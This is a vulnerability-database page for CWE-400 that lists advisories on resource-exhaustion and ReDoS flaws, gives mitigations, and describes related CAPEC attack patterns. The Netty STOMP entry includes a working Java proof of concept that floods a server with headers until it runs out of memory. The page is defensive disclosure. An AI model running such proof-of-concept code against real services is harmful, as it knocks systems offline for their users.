CWE-400
DiscouragedUncontrolled Resource Consumption
Abstraction: Class · Status: Draft
The product does not properly control the allocation and maintenance of a limited resource.
5412 vulnerabilities reference this CWE, most recent first.
GHSA-VH64-54PX-QGF8
Vulnerability from github – Published: 2025-03-03 16:21 – Updated: 2025-03-11 17:17Goroutine Leak in Abacus SSE Implementation
Summary
A critical goroutine leak vulnerability has been identified in the Abacus server's Server-Sent Events (SSE) implementation. The issue occurs when clients disconnect from the /stream endpoint, as the server fails to properly clean up resources and terminate associated goroutines. This leads to resource exhaustion where the server continues running but eventually stops accepting new SSE connections while maintaining high memory usage. The vulnerability specifically involves improper channel cleanup in the event handling mechanism, causing goroutines to remain blocked indefinitely.
POC
Impact
This vulnerability affects all versions of Abacus prior to v1.4.0. The issue causes:
- Permanent unresponsiveness of the
/streamendpoint after prolonged use - Memory growth that stabilizes at a high level but prevents proper functionality
- Selective denial of service affecting only SSE connections while other endpoints remain functional
- Accumulated orphaned goroutines that cannot be garbage collected
- High resource consumption under sustained client connection/disconnection patterns
Systems running Abacus in production with client applications that frequently establish and terminate SSE connections are most vulnerable. The issue becomes particularly apparent in high-traffic environments or during connection stress testing.
Patches
The vulnerability has been patched in Abacus v1.4.0. The fix includes:
- Implementing buffered channels to prevent blocking operations during cleanup
- Adding proper mutex-protected cleanup logic to ensure resources are released exactly once
- Implementing timeout protection for channel operations to prevent deadlocks
- Ensuring consistent cleanup when connections terminate unexpectedly
- Adding improved monitoring for client disconnections using request context
- Restructuring the event broadcasting system to safely handle client removal
Users should upgrade to v1.4.0 or later versions as soon as possible.
Workarounds
If upgrading is not immediately possible, the following workarounds can help mitigate the issue:
-
Limit maximum connections: Configure your reverse proxy to limit the maximum number of concurrent connections to the
/streamendpoints. -
Implement request timeouts: Configure your infrastructure to terminate long-lived SSE connections after a reasonable period.
-
Restart regularly: Schedule regular restarts of the Abacus service to reclaim resources.
-
Monitor memory usage: Set up alerts for abnormal memory growth patterns.
-
Separate instance for SSE: Run a dedicated Abacus instance solely for handling SSE connections, allowing it to be restarted without affecting the main API functionality.
References
- Go Concurrency Patterns: Context
- CWE-772: Missing Release of Resource after Effective Lifetime
- OWASP Top 10: Resource Exhaustion
- Resource Management in Go
For More Information
Please contact the Abacus security team at abacus@jsn.cam for additional information or to report further security issues.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/jasonlovesdoggo/abacus"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20250302043802-898ff1204e11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27421"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-772"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-03T16:21:46Z",
"nvd_published_at": "2025-03-03T17:15:15Z",
"severity": "HIGH"
},
"details": "## Goroutine Leak in Abacus SSE Implementation\n\n### Summary\n\nA critical goroutine leak vulnerability has been identified in the Abacus server\u0027s Server-Sent Events (SSE) implementation. The issue occurs when clients disconnect from the `/stream` endpoint, as the server fails to properly clean up resources and terminate associated goroutines. This leads to resource exhaustion where the server continues running but eventually stops accepting new SSE connections while maintaining high memory usage. The vulnerability specifically involves improper channel cleanup in the event handling mechanism, causing goroutines to remain blocked indefinitely.\n\n### [POC](https://github.com/JasonLovesDoggo/abacus/blob/main/docs/bugs/GHSA-vh64-54px-qgf8/test.py)\n\n### Impact\n\nThis vulnerability affects all versions of Abacus prior to v1.4.0. The issue causes:\n\n- Permanent unresponsiveness of the `/stream` endpoint after prolonged use\n- Memory growth that stabilizes at a high level but prevents proper functionality\n- Selective denial of service affecting only SSE connections while other endpoints remain functional\n- Accumulated orphaned goroutines that cannot be garbage collected\n- High resource consumption under sustained client connection/disconnection patterns\n\nSystems running Abacus in production with client applications that frequently establish and terminate SSE connections are most vulnerable. The issue becomes particularly apparent in high-traffic environments or during connection stress testing.\n\n### Patches\n\nThe vulnerability has been patched in Abacus v1.4.0. The fix includes:\n\n1. Implementing buffered channels to prevent blocking operations during cleanup\n2. Adding proper mutex-protected cleanup logic to ensure resources are released exactly once\n3. Implementing timeout protection for channel operations to prevent deadlocks\n4. Ensuring consistent cleanup when connections terminate unexpectedly\n5. Adding improved monitoring for client disconnections using request context\n6. Restructuring the event broadcasting system to safely handle client removal\n\nUsers should upgrade to v1.4.0 or later versions as soon as possible.\n\n### Workarounds\n\nIf upgrading is not immediately possible, the following workarounds can help mitigate the issue:\n\n1. **Limit maximum connections**: Configure your reverse proxy to limit the maximum number of concurrent connections to the `/stream` endpoints.\n\n2. **Implement request timeouts**: Configure your infrastructure to terminate long-lived SSE connections after a reasonable period.\n\n3. **Restart regularly**: Schedule regular restarts of the Abacus service to reclaim resources.\n\n4. **Monitor memory usage**: Set up alerts for abnormal memory growth patterns.\n\n5. **Separate instance for SSE**: Run a dedicated Abacus instance solely for handling SSE connections, allowing it to be restarted without affecting the main API functionality.\n\n### References\n\n- [Go Concurrency Patterns: Context](https://blog.golang.org/context)\n- [CWE-772: Missing Release of Resource after Effective Lifetime](https://cwe.mitre.org/data/definitions/772.html)\n- [OWASP Top 10: Resource Exhaustion](https://owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control)\n- [Resource Management in Go](https://go.dev/blog/defer-panic-and-recover)\n\n### For More Information\n\nPlease contact the Abacus security team at abacus@jsn.cam for additional information or to report further security issues.",
"id": "GHSA-vh64-54px-qgf8",
"modified": "2025-03-11T17:17:30Z",
"published": "2025-03-03T16:21:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/JasonLovesDoggo/abacus/security/advisories/GHSA-vh64-54px-qgf8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27421"
},
{
"type": "WEB",
"url": "https://github.com/JasonLovesDoggo/abacus/commit/78fdb9b48b7f6d08ed0cd41077509c0a97071552"
},
{
"type": "WEB",
"url": "https://github.com/JasonLovesDoggo/abacus/commit/898ff1204e11317cc161240b660e63eed5a72b33"
},
{
"type": "PACKAGE",
"url": "https://github.com/JasonLovesDoggo/abacus"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3498"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Goroutine Leak in Abacus SSE Implementation"
}
GHSA-VH77-2VV6-G7QH
Vulnerability from github – Published: 2022-05-13 01:35 – Updated: 2022-05-13 01:35On QFX5000 Series and EX4600 switches, a high rate of Ethernet pause frames or an ARP packet storm received on the management interface (fxp0) can cause egress interface congestion, resulting in routing protocol packet drops, such as BGP, leading to peering flaps. The following log message may also be displayed: fpc0 dcbcm_check_stuck_buffers: Buffers are stuck on queue 7 of port 45 This issue only affects the QFX5000 Series products (QFX5100, QFX5110, QFX5200, QFX5210) and the EX4600 switch. No other platforms are affected by this issue. Affected releases are Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D47 on QFX5000 Series and EX4600; 15.1 versions prior to 15.1R7, 15.1R8 on QFX5000 Series and EX4600; 15.1X53 versions prior to 15.1X53-D233 on QFX5000 Series and EX4600; 16.1 versions prior to 16.1R7 on QFX5000 Series and EX4600; 16.2 versions prior to 16.2R3 on QFX5000 Series and EX4600; 17.1 versions prior to 17.1R2-S9, 17.1R3 on QFX5000 Series and EX4600; 17.2 versions prior to 17.2R2-S6, 17.2R3 on QFX5000 Series and EX4600; 17.2X75 versions prior to 17.2X75-D42 on QFX5000 Series and EX4600; 17.3 versions prior to 17.3R3 on QFX5000 Series and EX4600; 17.4 versions prior to 17.4R2 on QFX5000 Series and EX4600; 18.1 versions prior to 18.1R2 on QFX5000 Series and EX4600.
{
"affected": [],
"aliases": [
"CVE-2018-0054"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-10-10T18:29:00Z",
"severity": "MODERATE"
},
"details": "On QFX5000 Series and EX4600 switches, a high rate of Ethernet pause frames or an ARP packet storm received on the management interface (fxp0) can cause egress interface congestion, resulting in routing protocol packet drops, such as BGP, leading to peering flaps. The following log message may also be displayed: fpc0 dcbcm_check_stuck_buffers: Buffers are stuck on queue 7 of port 45 This issue only affects the QFX5000 Series products (QFX5100, QFX5110, QFX5200, QFX5210) and the EX4600 switch. No other platforms are affected by this issue. Affected releases are Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D47 on QFX5000 Series and EX4600; 15.1 versions prior to 15.1R7, 15.1R8 on QFX5000 Series and EX4600; 15.1X53 versions prior to 15.1X53-D233 on QFX5000 Series and EX4600; 16.1 versions prior to 16.1R7 on QFX5000 Series and EX4600; 16.2 versions prior to 16.2R3 on QFX5000 Series and EX4600; 17.1 versions prior to 17.1R2-S9, 17.1R3 on QFX5000 Series and EX4600; 17.2 versions prior to 17.2R2-S6, 17.2R3 on QFX5000 Series and EX4600; 17.2X75 versions prior to 17.2X75-D42 on QFX5000 Series and EX4600; 17.3 versions prior to 17.3R3 on QFX5000 Series and EX4600; 17.4 versions prior to 17.4R2 on QFX5000 Series and EX4600; 18.1 versions prior to 18.1R2 on QFX5000 Series and EX4600.",
"id": "GHSA-vh77-2vv6-g7qh",
"modified": "2022-05-13T01:35:56Z",
"published": "2022-05-13T01:35:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0054"
},
{
"type": "WEB",
"url": "https://kb.juniper.net/JSA10888"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1041855"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VH8C-WFV5-X468
Vulnerability from github – Published: 2022-05-24 16:44 – Updated: 2022-05-24 16:44An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with next# at the beginning and nested repetition operators.
{
"affected": [],
"aliases": [
"CVE-2019-11389"
],
"database_specific": {
"cwe_ids": [
"CWE-185",
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-04-21T02:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with next# at the beginning and nested repetition operators.",
"id": "GHSA-vh8c-wfv5-x468",
"modified": "2022-05-24T16:44:03Z",
"published": "2022-05-24T16:44:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11389"
},
{
"type": "WEB",
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356"
},
{
"type": "WEB",
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-VHCH-2WF3-M8RP
Vulnerability from github – Published: 2026-07-14 20:16 – Updated: 2026-07-14 20:16Summary
The StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.
Details
io.netty.handler.codec.stomp.StompSubframeDecoder implements the STOMP protocol. The maxLineLength parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., a: 1\n), which are accumulated in memory inside the DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError.
PoC
Run the server with -Xmx256m
public final class ServerApp {
public static void main(String[] args) throws Exception {
EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
try {
ChannelFuture serverFuture = new ServerBootstrap()
.group(group)
.channel(NioServerSocketChannel.class)
.childHandler(new StompSubframeDecoder())
.bind(8080)
.sync();
serverFuture.channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}
public final class ClientApp {
public static void main(String[] args) throws Exception {
try (Socket socket = new Socket("127.0.0.1", 8080)) {
OutputStream out = socket.getOutputStream();
out.write("CONNECT\n".getBytes(StandardCharsets.UTF_8));
StringBuilder sb = new StringBuilder();
for (int i = 0; i < 1000; i++) {
sb.append("a:1\n");
}
byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);
for (int i = 1; i <= 50_000; i++) {
out.write(bulkHeaders);
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
Impact
Denial of Service: An attacker can easily exhaust the server's memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.15.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-stomp"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.16.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.135.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-stomp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.136.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44891"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-14T20:16:34Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.\n\n### Details\n`io.netty.handler.codec.stomp.StompSubframeDecoder` implements the STOMP protocol. The `maxLineLength` parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., `a: 1\\n`), which are accumulated in memory inside the `DefaultStompHeadersSubframe` until the JVM throws an OutOfMemoryError.\n\n### PoC\nRun the server with `-Xmx256m`\n\n```java\npublic final class ServerApp {\n public static void main(String[] args) throws Exception {\n EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());\n try {\n ChannelFuture serverFuture = new ServerBootstrap()\n .group(group)\n .channel(NioServerSocketChannel.class)\n .childHandler(new StompSubframeDecoder())\n .bind(8080)\n .sync();\n serverFuture.channel().closeFuture().sync();\n } finally {\n group.shutdownGracefully();\n }\n }\n}\n```\n\n```java\npublic final class ClientApp {\n public static void main(String[] args) throws Exception {\n try (Socket socket = new Socket(\"127.0.0.1\", 8080)) {\n OutputStream out = socket.getOutputStream();\n\n out.write(\"CONNECT\\n\".getBytes(StandardCharsets.UTF_8));\n\n StringBuilder sb = new StringBuilder();\n for (int i = 0; i \u003c 1000; i++) {\n sb.append(\"a:1\\n\");\n }\n byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);\n\n for (int i = 1; i \u003c= 50_000; i++) {\n out.write(bulkHeaders);\n }\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n}\n```\n\n### Impact\nDenial of Service: An attacker can easily exhaust the server\u0027s memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.",
"id": "GHSA-vhch-2wf3-m8rp",
"modified": "2026-07-14T20:16:34Z",
"published": "2026-07-14T20:16:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-vhch-2wf3-m8rp"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Netty: Denial of Service via Unbounded Headers in StompSubframeDecoder"
}
GHSA-VHFQ-GPQW-P5CW
Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32A Regular Expression Denial of Service (ReDoS) vulnerability exists in gaizhenbiao/chuanhuchatgpt, as of commit 20b2e02. The server uses the regex pattern r'<[^>]+>' to parse user input. In Python's default regex engine, this pattern can take polynomial time to match certain crafted inputs. An attacker can exploit this by uploading a malicious JSON payload, causing the server to consume 100% CPU for an extended period. This can lead to a Denial of Service (DoS) condition, potentially affecting the entire server.
{
"affected": [],
"aliases": [
"CVE-2024-10955"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-20T10:15:22Z",
"severity": "MODERATE"
},
"details": "A Regular Expression Denial of Service (ReDoS) vulnerability exists in gaizhenbiao/chuanhuchatgpt, as of commit 20b2e02. The server uses the regex pattern `r\u0027\u003c[^\u003e]+\u003e\u0027` to parse user input. In Python\u0027s default regex engine, this pattern can take polynomial time to match certain crafted inputs. An attacker can exploit this by uploading a malicious JSON payload, causing the server to consume 100% CPU for an extended period. This can lead to a Denial of Service (DoS) condition, potentially affecting the entire server.",
"id": "GHSA-vhfq-gpqw-p5cw",
"modified": "2025-03-20T12:32:41Z",
"published": "2025-03-20T12:32:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10955"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/8291f8d0-5060-47e7-9986-1f411310fb7b"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VHFW-V69P-CRCW
Vulnerability from github – Published: 2022-06-17 21:44 – Updated: 2022-09-01 20:11A vulnerability was discovered in the OPC UA .NET Standard Stack that allows a malicious client to cause a server to trigger an out of memory exception by sending a large number of message chunks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.4.368.53"
},
"package": {
"ecosystem": "NuGet",
"name": "OPCFoundation.NetStandard.Opc.Ua.Core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.368.58"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-29864"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-17T21:44:58Z",
"nvd_published_at": "2022-06-16T18:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability was discovered in the OPC UA .NET Standard Stack that allows a malicious client to cause a server to trigger an out of memory exception by sending a large number of message chunks.",
"id": "GHSA-vhfw-v69p-crcw",
"modified": "2022-09-01T20:11:21Z",
"published": "2022-06-17T21:44:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OPCFoundation/UA-.NETStandard/security/advisories/GHSA-vhfw-v69p-crcw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29864"
},
{
"type": "WEB",
"url": "https://files.opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2022-29864.pdf"
},
{
"type": "PACKAGE",
"url": "https://github.com/OPCFoundation/UA-.NETStandard"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Uncontrolled Resource Consumption in OPCFoundation.NetStandard.Opc.Ua.Core"
}
GHSA-VHJ2-4H8C-JC8M
Vulnerability from github – Published: 2025-04-29 03:30 – Updated: 2025-04-29 15:31The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, tvOS 18.4, macOS Ventura 13.7.5, iPadOS 17.7.6, macOS Sonoma 14.7.5, iOS 18.4 and iPadOS 18.4, watchOS 11.4, visionOS 2.4. An attacker on the local network may cause an unexpected app termination.
{
"affected": [],
"aliases": [
"CVE-2025-24251"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-29T03:15:34Z",
"severity": "MODERATE"
},
"details": "The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, tvOS 18.4, macOS Ventura 13.7.5, iPadOS 17.7.6, macOS Sonoma 14.7.5, iOS 18.4 and iPadOS 18.4, watchOS 11.4, visionOS 2.4. An attacker on the local network may cause an unexpected app termination.",
"id": "GHSA-vhj2-4h8c-jc8m",
"modified": "2025-04-29T15:31:50Z",
"published": "2025-04-29T03:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24251"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122371"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122372"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122373"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122374"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122375"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122376"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122377"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/122378"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VJ49-J7RC-H54F
Vulnerability from github – Published: 2023-08-25 21:30 – Updated: 2023-09-01 17:35An issue was discovered in Esoteric YamlBeans through 1.15. A crafted YAML document is able perform am XML Entity Expansion attack against YamlBeans YamlReader. By exploiting the Anchor feature in YAML, it is possible to generate a small YAML document that, when read, is expanded to a large size, causing CPU and memory consumption, such as a Java Out-of-Memory exception.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.esotericsoftware.yamlbeans:yamlbeans"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-24620"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2023-08-25T22:04:01Z",
"nvd_published_at": "2023-08-25T20:15:07Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Esoteric YamlBeans through 1.15. A crafted YAML document is able perform am XML Entity Expansion attack against YamlBeans YamlReader. By exploiting the Anchor feature in YAML, it is possible to generate a small YAML document that, when read, is expanded to a large size, causing CPU and memory consumption, such as a Java Out-of-Memory exception.",
"id": "GHSA-vj49-j7rc-h54f",
"modified": "2023-09-01T17:35:22Z",
"published": "2023-08-25T21:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24620"
},
{
"type": "WEB",
"url": "https://contrastsecurity.com"
},
{
"type": "WEB",
"url": "https://github.com/Contrast-Security-OSS/yamlbeans/blob/main/SECURITY.md"
},
{
"type": "WEB",
"url": "https://github.com/EsotericSoftware"
},
{
"type": "PACKAGE",
"url": "https://github.com/EsotericSoftware/yamlbeans"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Esoteric YamlBeans XML Entity Expansion vulnerability"
}
GHSA-VJPV-X8P9-7P85
Vulnerability from github – Published: 2024-07-10 06:33 – Updated: 2024-07-10 21:28All versions of the package images are vulnerable to Denial of Service (DoS) due to providing unexpected input types to several different functions. This makes it possible to reach an assert macro, leading to a process crash.
Note: By providing some specific integer values (like 0) to the size function, it is possible to obtain a Segmentation fault error, leading to the process crash.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "images"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.2.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-21523"
],
"database_specific": {
"cwe_ids": [
"CWE-241",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-10T21:28:42Z",
"nvd_published_at": "2024-07-10T05:15:11Z",
"severity": "HIGH"
},
"details": "All versions of the package images are vulnerable to Denial of Service (DoS) due to providing unexpected input types to several different functions. This makes it possible to reach an assert macro, leading to a process crash.\n\n**Note:**\nBy providing some specific integer values (like 0) to the size function, it is possible to obtain a Segmentation fault error, leading to the process crash.",
"id": "GHSA-vjpv-x8p9-7p85",
"modified": "2024-07-10T21:28:42Z",
"published": "2024-07-10T06:33:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21523"
},
{
"type": "WEB",
"url": "https://gist.github.com/dellalibera/8b4ea6b4db84cba212e6e6e39a6933d1"
},
{
"type": "PACKAGE",
"url": "https://github.com/zhangyuanwei/node-images"
},
{
"type": "WEB",
"url": "https://github.com/zhangyuanwei/node-images/blob/691d49f4e620b4eec9f1c47b1735841d9d8b55f6/src/Image.cc"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-IMAGES-6421826"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "images vulnerable to Denial of Service"
}
GHSA-VJXC-FRW4-JMH5
Vulnerability from github – Published: 2022-05-24 17:07 – Updated: 2022-11-07 22:04A vulnerability was found in the Undertow HTTP server in versions before 2.0.29 when listening on HTTPS. An attacker can target the HTTPS port to carry out a Denial Of Service (DOS) to make the service unavailable on SSL.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.undertow:undertow-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.29.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-14888"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-07T22:04:19Z",
"nvd_published_at": "2020-01-23T17:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability was found in the Undertow HTTP server in versions before 2.0.29 when listening on HTTPS. An attacker can target the HTTPS port to carry out a Denial Of Service (DOS) to make the service unavailable on SSL.",
"id": "GHSA-vjxc-frw4-jmh5",
"modified": "2022-11-07T22:04:19Z",
"published": "2022-05-24T17:07:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14888"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0729"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14888"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220211-0001"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Undertow vulnerable to Uncontrolled Resource Consumption"
}
Mitigation
Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
Mitigation
- Mitigation of resource exhaustion attacks requires that the target system either:
- The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
- The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
- recognizes the attack and denies that user further access for a given amount of time, or
- uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Ensure that protocols have specific limits of scale placed on them.
Mitigation
Ensure that all failures in resource allocation place the system into a safe posture.
CAPEC-147: XML Ping of the Death
An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
CAPEC-227: Sustained Client Engagement
An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.